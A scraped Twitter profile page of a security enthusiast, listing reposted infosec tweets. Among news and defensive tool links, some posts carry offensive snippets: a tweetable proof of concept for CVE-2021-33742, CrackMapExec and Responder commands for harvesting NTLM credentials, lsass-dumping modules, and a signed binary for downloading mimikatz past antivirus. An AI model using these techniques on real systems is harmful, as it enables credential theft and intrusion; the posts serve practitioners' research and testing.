brezel (@br3zel) 's Twitter Profile
brezel

@br3zel

IT-Security, ArchLinux Enthusiast, More music..

ID: 323690670

Link: https://www.youtube.com/watch?v=FZT62Gbb3iE
Joined: 25-06-2011 07:39:36

641 Tweets

198 Followers

797 Following

Quarks (@quarkswdr) 's Twitter Profile Photo

At first a stark taboo, and eventually nobody is outraged anymore. There's a simple trick behind that. In light of current events.

Ivan Fratric 💙💛 (@ifsecure) 's Twitter Profile Photo

CVE-2021-33742 tweetable PoC: <script> var b = document.createElement("html"); b.innerHTML = Array(40370176).toString(); b.innerHTML = ""; </script>

Jonas L (@jonaslyk) 's Twitter Profile Photo

yarh- for some reason on win11 the SAM file now is READ for users.
So if you have shadowvolumes enabled you can read the sam file like this:

I don't know the full extent of the issue yet, but it's too many to not be a problem I think.

Maximus (@gladiatx0r) 's Twitter Profile Photo

I've published my first 'Gist' combining several well known techniques to accomplish Windows workstation takeover in a default Active Directory Configuration. SMB writeable shares are spicier than ever. 🌶️ gist.github.com/gladiatx0r/1ff…

Florian Roth ⚡️ (@cyb3rops) 's Twitter Profile Photo

For a compromise assessment of #Exchange servers I recommend using our free THOR Lite scanner

We've added all rules & IOCs relevant to #ProxyShell exploitation & update them frequently

THOR Lite
nextron-systems.com/thor-lite/

YARA rules
github.com/Neo23x0/signat…
github.com/Neo23x0/signat…

mpgn (@mpgn_x64) 's Twitter Profile Photo

In case you want to see something cool about CrackMapExec and Responder 😌😋

1⃣ cme smb <ip> -u user -p pass --shares
2⃣ Responder -I eth0
3⃣ cme smb <ip> -u user -p pass -M slinky -o ...

Harvest ntlmv2/v1 credentials in no time if you have write access to a share 🔥

🪂

Elliot (@elliotkillick) 's Twitter Profile Photo

Need to go under the radar downloading #mimikatz (and other suspect payloads)? Then newly discovered #lolbin "C:\Windows\System32\Cmdl32.exe" (signed by MS) is for you. It's like a new certutil.exe but absolutely unheard of by any antivirus software!

The Hacker's Choice (@thc@infosec.exchange) (@hackerschoice) 's Twitter Profile Photo

Threema does not have forward secrecy (soatok.blog/2021/11/05/thr…) and local keys are stored insecurely. DROPPED from tiny.cc/thcstfu. Stay safe. #privacy #COP26

mpgn (@mpgn_x64) 's Twitter Profile Photo

Lately, two new tools for dumping the lsass process have come up: HandleKatz and nanodump 👀

I've integrated them to CrackMapExec as module:
1⃣ -M handlekatz 
2⃣ -M nanodump
3⃣ -M procdump (as bonus 😝)
(dmp parsed by pypykatz from SkelSec)

Available on Porchetta Industries 🪂

diversenok (@diversenok_zero) 's Twitter Profile Photo

Did you know that it is possible to read memory using a PROCESS_CREATE_PROCESS handle? Just call NtCreateProcessEx to clone the target process (and its entire address space), and then read anything you want from there.😎

Niklaus Schiess (@_takeshix) 's Twitter Profile Photo

My latest North Korea research with Martyn Williams is now publicly available: lumen.global/reveal-report Also added it to the DB: dprktech.adversec.com/post/project-r…

Velociraptor (@velocidex) 's Twitter Profile Photo

Watch the replay of VeloCON 2023 on our YouTube channel. You can relive the entire conference or watch any individual presentations you may have missed. youtube.com/watch?v=WWB5xe…

Lukas Klein | @rantasec.bsky.social (@rantasec) 's Twitter Profile Photo

Check out GoLinHound: - Discovers Linux & SSH attack paths - Outputs OpenGraph JSON for BloodHound ingestion - Integrates with SharpHound and AzureHound data to unveil cross-technology attack paths github.com/RantaSec/golin…